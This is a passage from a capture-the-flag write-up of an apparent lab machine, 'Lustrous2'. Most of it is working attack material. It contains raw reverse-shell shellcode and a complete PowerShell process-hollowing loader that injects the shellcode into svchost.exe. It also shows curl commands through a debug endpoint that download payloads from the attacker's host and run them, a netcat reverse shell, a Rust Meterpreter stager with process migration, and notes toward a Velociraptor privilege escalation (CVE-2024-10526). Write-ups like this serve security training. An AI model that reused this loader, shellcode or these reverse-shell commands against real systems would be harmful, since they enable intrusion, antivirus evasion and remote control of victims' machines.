0xda,0x49,0xc7,0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

Include it to our custom PoSH reverse shell:

[Byte[]] $SHELLCODE = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x56,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x4d,0x31,0xc9,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,0xd,0xac,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x48,0x1,0xd0,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x0,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,0x7,0xff,0xd5,0x53,0x53,0xe8,0x54,0x0,0x0,0x0,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x4d,0x61,0x63,0x69,0x6e,0x74,0x6f,0x73,0x68,0x3b,0x20,0x49,0x6e,0x74,0x65,0x6c,0x20,0x4d,0x61,0x63,0x20,0x4f,0x53,0x20,0x58,0x20,0x31,0x34,0x2e,0x37,0x3b,0x20,0x72,0x76,0x3a,0x31,0x33,0x33,0x2e,0x30,0x29,0x20,0x47,0x65,0x63,0x6b,0x6f,0x2f,0x32,0x30,0x31,0x30,0x30,0x31,0x30,0x31,0x20,0x46,0x69,0x72,0x65,0x66,0x6f,0x78,0x2f,0x31,0x33,0x33,0x2e,0x30,0x0,0x59,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xb,0x0,0x0,0x0,0x31,0x30,0x2e,0x38,0x2e,0x34,0x2e,0x32,0x35,0x33,0x0,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0xbb,0x1,0x0,0x0,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x3,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x0,0x0,0x0,0x0,0xff,0xd5,0xe8,0xab,0x0,0x0,0x0,0x2f,0x46,0x42,0x7a,0x41,0x34,0x63,0x38,0x32,0x56,0x37,0x59,0x32,0x52,0x7a,0x64,0x46,0x55,0x64,0x66,0x39,0x31,0x41,0x64,0x61,0x37,0x54,0x34,0x67,0x58,0x44,0x6d,0x45,0x6f,0x31,0x4a,0x6a,0x59,0x49,0x71,0x57,0x65,0x68,0x52,0x77,0x6b,0x78,0x6c,0x45,0x39,0x69,0x55,0x32,0x38,0x32,0x71,0x36,0x6f,0x42,0x6e,0x68,0x5f,0x63,0x78,0x56,0x33,0x4f,0x71,0x33,0x2d,0x76,0x63,0x48,0x59,0x76,0x73,0x6a,0x51,0x64,0x4d,0x6c,0x54,0x6d,0x41,0x6d,0x6a,0x68,0x70,0x34,0x4c,0x57,0x37,0x2d,0x35,0x73,0x58,0x2d,0x42,0x53,0x34,0x5a,0x4f,0x65,0x64,0x68,0x68,0x5f,0x49,0x46,0x79,0x56,0x32,0x35,0x49,0x56,0x32,0x48,0x53,0x72,0x59,0x42,0x35,0x33,0x63,0x4f,0x74,0x37,0x5f,0x54,0x46,0x4d,0x48,0x51,0x39,0x63,0x6c,0x6e,0x32,0x56,0x68,0x71,0x5a,0x37,0x67,0x72,0x63,0x73,0x7a,0x37,0x4f,0x48,0x48,0x6d,0x45,0x69,0x66,0x33,0x4b,0x69,0x57,0x65,0x7a,0x70,0x78,0x51,0x66,0x78,0x39,0x74,0x52,0x0,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x0,0x32,0xa8,0x84,0x0,0x0,0x0,0x0,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0xa,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,0x80,0x33,0x0,0x0,0x49,0x89,0xe0,0x6a,0x4,0x41,0x59,0x49,0xba,0x75,0x46,0x9e,0x86,0x0,0x0,0x0,0x0,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x0,0x0,0x49,0xba,0x44,0xf0,0x35,0xe0,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0xff,0xcf,0x74,0x2,0xeb,0xaa,0xe8,0x55,0x0,0x0,0x0,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x0,0x10,0x0,0x0,0x49,0xba,0x58,0xa4,0x53,0xe5,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x0,0x20,0x0,0x0,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x0,0x0,0x0,0x0,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x7,0x48,0x1,0xc3,0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x0,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

filter Get-Type ([string]$dllName,[string]$typeName)
{
    if( $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($dllName) )
    {
        $_.GetType($typeName)
    }
}

function Get-Function
{
    Param(
        [string] $module,
        [string] $function
    )

    if( ($null -eq $GetModuleHandle) -or ($null -eq $GetProcAddress) )
    {
        throw "Error: GetModuleHandle and GetProcAddress must be initialized first!"
    }

    $moduleHandle = $GetModuleHandle.Invoke($null, @($module))
    $GetProcAddress.Invoke($null, @($moduleHandle, $function))
}

function Get-Delegate
{
    Param (
        [Parameter(Position = 0, Mandatory = $True)] [IntPtr] $funcAddr,
        [Parameter(Position = 1, Mandatory = $True)] [Type[]] $argTypes,
        [Parameter(Position = 2)] [Type] $retType = [Void]
    )

    $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('QD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).
    DefineDynamicModule('QM', $false).
    DefineType('QT', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $argTypes).SetImplementationFlags('Runtime, Managed')
    $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $retType, $argTypes).SetImplementationFlags('Runtime, Managed')
    $delegate = $type.CreateType()

    [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcAddr, $delegate)
}

# Obtain the required types via reflection
$assemblies = [AppDomain]::CurrentDomain.GetAssemblies()
$unsafeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.UnsafeNativeMethods'
$nativeMethodsType = $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods'
$startupInformationType =  $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.NativeMethods+STARTUPINFO'
$processInformationType =  $assemblies | Get-Type 'System.dll' 'Microsoft.Win32.SafeNativeMethods+PROCESS_INFORMATION'

# Obtain the required functions via reflection: GetModuleHandle, GetProcAddress and CreateProcess
$GetModuleHandle = $unsafeMethodsType.GetMethod('GetModuleHandle')
$GetProcAddress = $unsafeMethodsType.GetMethod('GetProcAddress', [reflection.bindingflags]'Public,Static', $null, [System.Reflection.CallingConventions]::Any, @([System.IntPtr], [string]), $null);
$CreateProcess = $nativeMethodsType.GetMethod("CreateProcess")

# Obtain the function addresses of the required hollowing functions
$ResumeThreadAddr = Get-Function "kernel32.dll" "ResumeThread"
$ReadProcessMemoryAddr = Get-Function "kernel32.dll" "ReadProcessMemory"
$WriteProcessMemoryAddr = Get-Function "kernel32.dll" "WriteProcessMemory"
$ZwQueryInformationProcessAddr = Get-Function "ntdll.dll" "ZwQueryInformationProcess"

# Create the delegate types to call the previously obtain function addresses
$ResumeThread = Get-Delegate $ResumeThreadAddr @([IntPtr])
$WriteProcessMemory = Get-Delegate $WriteProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int32], [IntPtr])
$ReadProcessMemory = Get-Delegate $ReadProcessMemoryAddr @([IntPtr], [IntPtr], [Byte[]], [Int], [IntPtr]) ([Bool])
$ZwQueryInformationProcess = Get-Delegate $ZwQueryInformationProcessAddr @([IntPtr], [Int], [Byte[]], [UInt32], [UInt32]) ([Int])

# Instantiate the required structures for CreateProcess and use them to launch svchost.exe
$startupInformation = $startupInformationType.GetConstructors().Invoke($null)
$processInformation = $processInformationType.GetConstructors().Invoke($null)

$cmd = [System.Text.StringBuilder]::new("C:\\Windows\\System32\\svchost.exe")
$CreateProcess.Invoke($null, @($null, $cmd, $null, $null, $false, 0x4, [IntPtr]::Zero, $null, $startupInformation, $processInformation))

# Obtain the required handles from the PROCESS_INFORMATION structure
$hThread = $processInformation.hThread
$hProcess = $processInformation.hProcess

# Create a buffer to hold the PROCESS_BASIC_INFORMATION structure and call ZwQueryInformationProcess
$processBasicInformation = [System.Byte[]]::CreateInstance([System.Byte], 48)
$ZwQueryInformationProcess.Invoke($hProcess, 0, $processBasicInformation, $processBasicInformation.Length, 0)

# Locate the image base address. The address of the PEB is the second element within the PROCESS_BASIC_INFORMATION
# structure (e.g. offset 0x08 within the $processBasicInformation buffer on x64). Within the PEB, the base image
# addr is located at offset 0x10.
$imageBaseAddrPEB = ([IntPtr]::new([BitConverter]::ToUInt64($processBasicInformation, 0x08) + 0x10))

# Use ReadProcessMemory to read the required part of the PEB. We allocate already a buffer for 0x200
# bytes that we will use later on. From the PEB we actually only need 0x08 bytes, as $imageBaseAddrPEB
# already points to the correct memory location. We parse the obtained 0x08 bytes as Int64 and IntPtr.
$memoryBuffer = [System.Byte[]]::CreateInstance([System.Byte], 0x200)
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPEB, $memoryBuffer, 0x08, 0)

$imageBaseAddr = [BitConverter]::ToInt64($memoryBuffer, 0)
$imageBaseAddrPointer = [IntPtr]::new($imageBaseAddr)

# Now that we have the base address, we can read the first 0x200 bytes to obtain the PE file format header.
# The offset of the PE header is at 0x3c within the PE file format header. Within the PE header, the relative
# entry point address can be found at an offset of 0x28. We combine this with the $imageBaseAddr and have finally
# found the non relative entry point address.
$ReadProcessMemory.Invoke($hProcess, $imageBaseAddrPointer, $memoryBuffer, $memoryBuffer.Length, 0)

$peOffset = [BitConverter]::ToUInt32($memoryBuffer, 0x3c)                               # PE header offset
$entryPointAddrRelative = [BitConverter]::ToUInt32($memoryBuffer, $peOffset + 0x28)     # Relative entrypoint
$entryPointAddr = [IntPtr]::new($imageBaseAddr + $entryPointAddrRelative)               # Absolute entrypoint

# Overwrite the entrypoint with shellcode and resume the thread.
$WriteProcessMemory.Invoke($hProcess, $entryPointAddr, $SHELLCODE, $SHELLCODE.Length, [IntPtr]::Zero)
$ResumeThread.Invoke($hThread)

# Close powershell to remove it as the parent of svchost.exe
exit

Try to upload then execute a PoSH reverse shell:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=iwr http://10.8.4.253/rshell.txt -outfile c:\programdata\rshell.ps1' -X POST
$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=c:\programdata\rshell.ps1' -X POST
Errors:
File C:\programdata\rshell.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https://go.microsoft.com/fwlink/?LinkID=135170.

Failed, powershell scripts are restricted then we need an exe binary

So we proceed with the powershell module ps2exe to convert ps1 to exe:

PS C:\temp> Install-Module ps2exe                                                                   
PS C:\temp> ps2exe .\rshell.ps1 .\rshell.exe -noConsole

Then try again:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=iwr http://10.8.4.253/rshell.exe -outfile c:\programdata\rshell.exe' -X POST
$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=c:\programdata\rshell.exe' -X POST

No warning but no shell

After few seconds we try to run it again:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=c:\programdata\rshell.exe' -X POST
Errors:
The term 'c:\programdata\rshell.exe' is not recognized as a name of a cmdlet, function, script file, or executable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

So we have been catch by a security software like antivirus or edr.

with Netcat + Penelope

Ok let’s go to try with a simple netcat then upgrade to a Meterpreter shell.

We keep our current local web server running, stop the Meterpreter listener and start a Penelope listener:

$ penelope 443 -i tun0
[+] Listening for reverse shells on 10.8.4.253:443 
➤  💀 Show Payloads (p) 🏠 Main Menu (m) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)

Upload and run our netcat on the target:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=iwr http://10.8.4.253/nc64.exe -outfile c:\programdata\nc.exe' -X POST
$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=c:\programdata\nc.exe 10.8.4.253 443 -e cmd' -X POST

Got a shell and grab the flag Lustrous2_User:

[+] Got reverse shell from 💻 lus2dc.lustrous2.vl~10.10.71.5 😍️ - Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D 
[+] Logging to /home/user/.penelope/lus2dc.lustrous2.vl~10.10.71.5/lus2dc.lustrous2.vl~10.10.71.5.log 📜
C:\inetpub\lushare>cd c:\
cd c:\

c:\>dir
dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\

09/06/2024  07:39 AM    <DIR>          datastore
09/06/2024  04:37 AM    <DIR>          inetpub
05/08/2021  12:20 AM    <DIR>          PerfLogs
09/07/2024  04:41 AM    <DIR>          Program Files
09/06/2024  04:38 AM    <DIR>          Program Files (x86)
09/06/2024  05:57 AM    <DIR>          temp
08/31/2024  12:56 AM    <DIR>          Users
09/06/2024  07:52 AM                36 user_2e9c1.txt
09/07/2024  04:55 AM    <DIR>          Windows
               1 File(s)             36 bytes
               8 Dir(s)   4,546,330,624 bytes free

c:\>type user_2e9c1.txt
type user_2e9c1.txt
VL{636d8f0a348196f1c939d33bedc5e0e8}

with Rust stager + MSF shellcode

Another way can be using Rust to create a stager with a MSF shellcode:

Install the requirement for our project:

$ sudo apt install rustup
$ rustup default stable
$ rustup target add x86_64-pc-windows-gnu 
$ git clone https://github.com/0xdea/backdoo-rs.git
$ cd backdoo-rs
$ cargo build --release --target x86_64-pc-windows-gnu
$ cp target/x86_64-pc-windows-gnu/release/backdoo-rs.exe ../.
$ cd ..

Start a Meterpreter listener:

$ msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; set ExitOnSession false; exploit -j"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
LHOST => tun0
LPORT => 443
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.8.4.253:443 
msf6 exploit(multi/handler) > 

Try to upload then execute a Rust stager:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=iwr http://10.8.4.253/backdoo-rs.exe -outfile c:\programdata\backdoo-rs.exe' -X POST
$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=c:\programdata\backdoo-rs.exe 10.8.4.253:443' -X POST
backdoo-rs - A simple Meterpreter stager written in Rust
Copyright (c) 2024 Marco Ivaldi <raptor@0xdeadbeef.info>

[*] Using reverse_tcp stager (10.8.4.253:443)
[+] Payload received!

another way can be:

$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary 'pin=ba45c518&command=iwr http://10.8.4.253/backdoo-rs.exe -outfile c:\programdata\backdoo-rs.exe' -X POST
$ curl --negotiate -u : http://lus2dc.lustrous2.vl/File/Debug --data-binary "pin=ba45c518&command=Start-Process -FilePath 'c:\programdata\backdoo-rs.exe' -ArgumentList '10.8.4.253:443'" -X POST

We got a shell as ShareSvc:

[*] Sending stage (203846 bytes) to 10.10.92.197
[*] Sending stage (203846 bytes) to 10.10.92.197
[*] Meterpreter session 2 opened (10.8.4.253:443 -> 10.10.92.197:65104) at 2025-01-31 19:10:34 +0900

msf6 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         meterpreter x64/windows                               10.8.4.253:443 -> 10.10.92.197:65103 (10.10.92.197)
  2         meterpreter x64/windows  LUSTROUS2\ShareSvc @ LUS2DC  10.8.4.253:443 -> 10.10.92.197:65104 (10.10.92.197)

We migrate to another process:

msf6 exploit(multi/handler) > sessions 2
meterpreter > ps

Process List
============

 PID   PPID  Name                                       Arch  Session  User                Path
 ---   ----  ----                                       ----  -------  ----                ----
 0     0     [System Process]
 4     0     System
 96    4     Registry
 292   656   svchost.exe
 320   4     smss.exe
 344   656   svchost.exe
 440   432   csrss.exe
 508   656   svchost.exe
 516   504   csrss.exe
 536   432   wininit.exe
 592   504   winlogon.exe
 656   536   services.exe
 676   536   lsass.exe
 868   656   svchost.exe
 912   656   svchost.exe
 1036  656   svchost.exe
 1044  656   svchost.exe
 1052  656   svchost.exe
 1068  592   dwm.exe
 1144  656   svchost.exe
 1256  656   svchost.exe
 1328  4832  backdoo-rs.exe                             x64   0        LUSTROUS2\ShareSvc  C:\ProgramData\backdoo-rs.exe
 1420  656   svchost.exe
 1528  656   svchost.exe
 1804  656   svchost.exe
 2064  656   spoolsv.exe
 2080  2196  AggregatorHost.exe
 2132  656   svchost.exe
 2152  656   certsrv.exe
 2164  656   svchost.exe
 2196  656   svchost.exe
 2228  656   svchost.exe
 2264  656   SecurityHealthService.exe
 2268  656   vds.exe
 2300  656   svchost.exe
 2340  656   ismserv.exe
 2348  656   Microsoft.ActiveDirectory.WebServices.exe
 2412  656   vm3dservice.exe
 2432  656   MsMpEng.exe
 2464  656   dns.exe
 2484  656   Velociraptor.exe
 2516  656   dfsrs.exe
 2532  656   dfssvc.exe
 2748  2412  vm3dservice.exe
 3348  656   Velociraptor.exe
 3368  2192  MicrosoftEdgeUpdate.exe
 3728  592   fontdrvhost.exe
 3732  536   fontdrvhost.exe
 3828  592   LogonUI.exe
 4196  656   NisSrv.exe
 4696  656   msdtc.exe
 4832  2300  w3wp.exe                                   x64   0        LUSTROUS2\ShareSvc  C:\Windows\System32\inetsrv\w3wp.exe
 5084  4832  conhost.exe                                x64   0        LUSTROUS2\ShareSvc  C:\Windows\System32\conhost.exe
meterpreter > migrate 4832
[*] Migrating from 1328 to 4832...
[*] Migration completed successfully.

Privilege Escalation (Lustrous2_Root)

We proceed to a local enumeration.

We found a non standard folder named datastore at C:\

c:\>dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\

09/06/2024  07:39 AM    <DIR>          datastore
09/06/2024  04:37 AM    <DIR>          inetpub
05/08/2021  12:20 AM    <DIR>          PerfLogs
09/07/2024  04:41 AM    <DIR>          Program Files
09/06/2024  04:38 AM    <DIR>          Program Files (x86)
09/06/2024  05:57 AM    <DIR>          temp
08/31/2024  12:56 AM    <DIR>          Users
09/06/2024  07:52 AM                36 user_2e9c1.txt
09/07/2024  04:55 AM    <DIR>          Windows
               1 File(s)             36 bytes
               8 Dir(s)   4,542,271,488 bytes free

c:\>cd datastore
c:\datastore>tree
Folder PATH listing for volume System
Volume serial number is 58B1-CECF
C:.
+---acl
+---clients
�   +---C.f0551400529f04d1
�   �   +---artifacts
�   �   �   +---Generic.Client.Info
�   �   �   �   +---F.CRDI2HL5I2RI6
�   �   �   +---Windows.System.CmdShell
�   �   +---collections
�   �   �   +---F.CRDI2HL5I2RI6
�   �   �   +---F.CRDI33HLPHFIS
�   �   +---flow_index
�   �   �   +---filter
�   �   �   �   +---Artifacts
�   �   �   �       +---%28%3Fi%29%28Windows.System.PowerShell%7CWindows.System.CmdShell%7CLinux.Sys.BashShell%7CGeneric.Client.VQL%29
�   �   �   �           +---sorted
�   �   �   �               +---FlowId
�   �   �   �                   +---asc
�   �   �   +---sorted
�   �   �       +---FlowId
�   �   �           +---asc
�   �   +---monitoring
�   �   �   +---Generic.Client.Stats
�   �   +---monitoring_logs
�   �   �   +---Generic.Client.Stats
�   �   +---tasks
�   +---server
�       +---flow_index
�       �   +---filter
�       �   �   +---Creator
�       �   �       +---%28%3Fi%29operator
�       �   �           +---sorted
�       �   �               +---FlowId
�       �   �                   +---asc
�       �   +---sorted
�       �       +---FlowId
�       �           +---asc
�       +---monitoring
�           +---System.Flow.Completion
+---client_info
+---config
�   +---secrets
+---logs
+---notebooks
�   +---Dashboards
�       +---Server.Internal.Welcome
�       +---Server.Monitor.Health
�           +---uploads
�               +---data
+---server_artifacts
�   +---Server.Audit.Logs
�   +---Server.Internal.ArtifactModification
�   +---Server.Monitor.Health
�       +---Prometheus
+---server_artifact_logs
�   +---Server.Monitor.Health
�       +---Prometheus
+---users
    +---admin
    �   +---mru
    +---gui

Seems related to a client/server app with a gui.

Checking more under acl folder we found that is related to Velociraptor, an advanced digital forensic and incident response tool that enhances your visibility into your endpoints:

c:\datastore\acl>dir /A
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\datastore\acl

09/06/2024  07:48 AM    <DIR>          .
09/06/2024  07:39 AM    <DIR>          ..
09/06/2024  07:34 AM                27 admin.json.db
09/06/2024  07:47 AM                97 operator.json.db
01/31/2025  03:57 PM                40 VelociraptorServer.json.db

We found that 2 accounts exist with different roles:

c:\datastore\acl>type admin.json.db
{"roles":["administrator"]}

c:\datastore\acl>type operator.json.db
{"filesystemWrite":true, "roles":["reader", "analyst", "investigator", "artifact_writer", "api"]}

Check if it’s installed:

c:\Program Files>dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\Program Files

09/07/2024  04:41 AM    <DIR>          .
09/07/2024  04:54 AM    <DIR>          Amazon
08/31/2024  12:03 AM    <DIR>          Common Files
09/06/2024  04:39 AM    <DIR>          dotnet
09/06/2024  04:38 AM    <DIR>          IIS
08/31/2024  12:32 AM    <DIR>          Internet Explorer
05/08/2021  12:20 AM    <DIR>          ModifiableWindowsApps
09/06/2024  07:35 AM    <DIR>          Velociraptor
09/06/2024  07:34 AM    <DIR>          VelociraptorServer
09/07/2024  04:40 AM    <DIR>          VMware
08/31/2024  12:55 AM    <DIR>          Windows Defender
08/31/2024  12:32 AM    <DIR>          Windows Defender Advanced Threat Protection
08/31/2024  12:32 AM    <DIR>          Windows Mail
08/31/2024  12:32 AM    <DIR>          Windows Media Player
05/08/2021  01:35 AM    <DIR>          Windows NT
03/02/2022  07:58 PM    <DIR>          Windows Photo Viewer
05/08/2021  12:34 AM    <DIR>          WindowsPowerShell

Confirmed both client and server are installed

Checking more we found the Velociraptor version v0.72.4:

c:\Program Files\VelociraptorServer>dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\Program Files\VelociraptorServer

09/06/2024  07:34 AM    <DIR>          .
09/07/2024  04:41 AM    <DIR>          ..
09/06/2024  07:34 AM             2,563 client.config.yaml
09/06/2024  07:34 AM            12,972 server.config.yaml
09/06/2024  07:03 AM        60,144,064 velociraptor-v0.72.4-windows-amd64.exe
               3 File(s)     60,159,599 bytes
               2 Dir(s)   4,540,334,080 bytes free

We found an interesting BIG warning on the top of the main page related to the CVE-2024-10526 impacted Velociraptor version < 0.73.3:

image

So seems we are vulnrable

CVE-2024-10526 - LPE In Windows Velociraptor Service

Note
  • CVE-2024-10526 Local Privilege Escalation In Windows Velociraptor Service
    • The Velociraptor Windows MSI installer creates the installation directory with WRITE_DACL permission to the BUILTIN\Users group.
    • This allows local users who are not administrators to grant themselves the Full Control permission on Velociraptor’s files. By modifying Velociraptor’s files, local users can subvert the binary and cause the Velociraptor service to execute arbitrary code as the SYSTEM user, or to replace the Velociraptor binary completely.

In the VelociraptorServer folder, we found the server configuration file `server.config.yaml':

c:\Program Files\VelociraptorServer>dir
 Volume in drive C is System
 Volume Serial Number is 58B1-CECF

 Directory of c:\Program Files\VelociraptorServer

09/06/2024  07:34 AM    <DIR>          .
09/07/2024  04:41 AM    <DIR>          ..
09/06/2024  07:34 AM             2,563 client.config.yaml
09/06/2024  07:34 AM            12,972 server.config.yaml
09/06/2024  07:03 AM        60,144,064 velociraptor-v0.72.4-windows-amd64.exe
               3 File(s)     60,159,599 bytes
               2 Dir(s)   4,525,019,136 bytes free

c:\Program Files\VelociraptorServer>type server.config.yaml
version:
  name: velociraptor
  version: 0.72.4
  commit: d568709b
  build_time: "2024-07-04T14:03:05Z"
  install_time: 1725636828
  compiler: go1.22.5
Client:
  server_urls:
  - https://localhost:8000/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
    MIIDSzCCAjOgAwIBAgIQIRnpQjrW1aIURqQbu2cKojANBgkqhkiG9w0BAQsFADAa
    MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjQwOTA2MTUzNDA0WhcNMzQw
    OTA0MTUzNDA0WjAaMRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwggEiMA0GCSqG
    SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDjJw2CgQEZOA4WGz2iSi2Wre432XHGPNmS
    SCb47TG3BIW7YPvD73frcEhhX2ixWLXPpfs7qQdMe9Zi5rV16RgXw25R9x13awU5
    1J/KUeNiMxmrQB9KSCUHO3e8kDEuLC0wV26K76TVX8KIm0vklJP4mpv7Mj9CgHBN
    4qGwTqB1y7h2wyTanUJlwasY/lGU5u7w4wj2z6+OOOA+/S9NEiJ3Sw+fcd+dma2C
    kzqFEYioa3GED+veIfu+OFRyWaO3Pce2gV57ZXnli3AhtQMoFb1w5l6O5IQzhrKU
    7inc3KSb8kG+2vzQB4jwGLU0+wbSkyckXY+5592uIG3tVvdy+L9bAgMBAAGjgYww
    gYkwDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
    AjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTfTRyiGGBqOr5F541v8pOYkcFz
    ADAoBgNVHREEITAfgh1WZWxvY2lyYXB0b3JfY2EudmVsb2NpZGV4LmNvbTANBgkq
    hkiG9w0BAQsFAAOCAQEAt4tFN1KZF1wrmhOT/1f0DXnwgaACkhJmC2HARfp46hGY
    FvqumxwNkUTc0hyPdwK2iy+57RCTS70CgGvsvSf6bDx7jSBpBJ8KzYXxOwcNRPaK
    4KJV7ZQQA2U6ax3c5LNuUupY63tRh7j/AgeVvnVP8CLTEvWTHD1kEQ/cTyn0XDSn
    7yINImANYuWJkWO6i9eKXYxTGXWhG+n1xEmQvZIed8SsOyt/pvTbFnUtKNTokUnb
    B71PNi/CkZRJpULuAk9eJvLgKhEgIeVpY2rxYvVPBJNqwWwGypKOzWGX0+ueQReQ
    is5cJn9DbPiu82yg/HdQu9vfroG+QktqdZgx5KJkxA==
    -----END CERTIFICATE-----
  nonce: BpoGFOhazN8=
  writeback_darwin: /etc/velociraptor.writeback.yaml
  writeback_linux: /etc/velociraptor.writeback.yaml
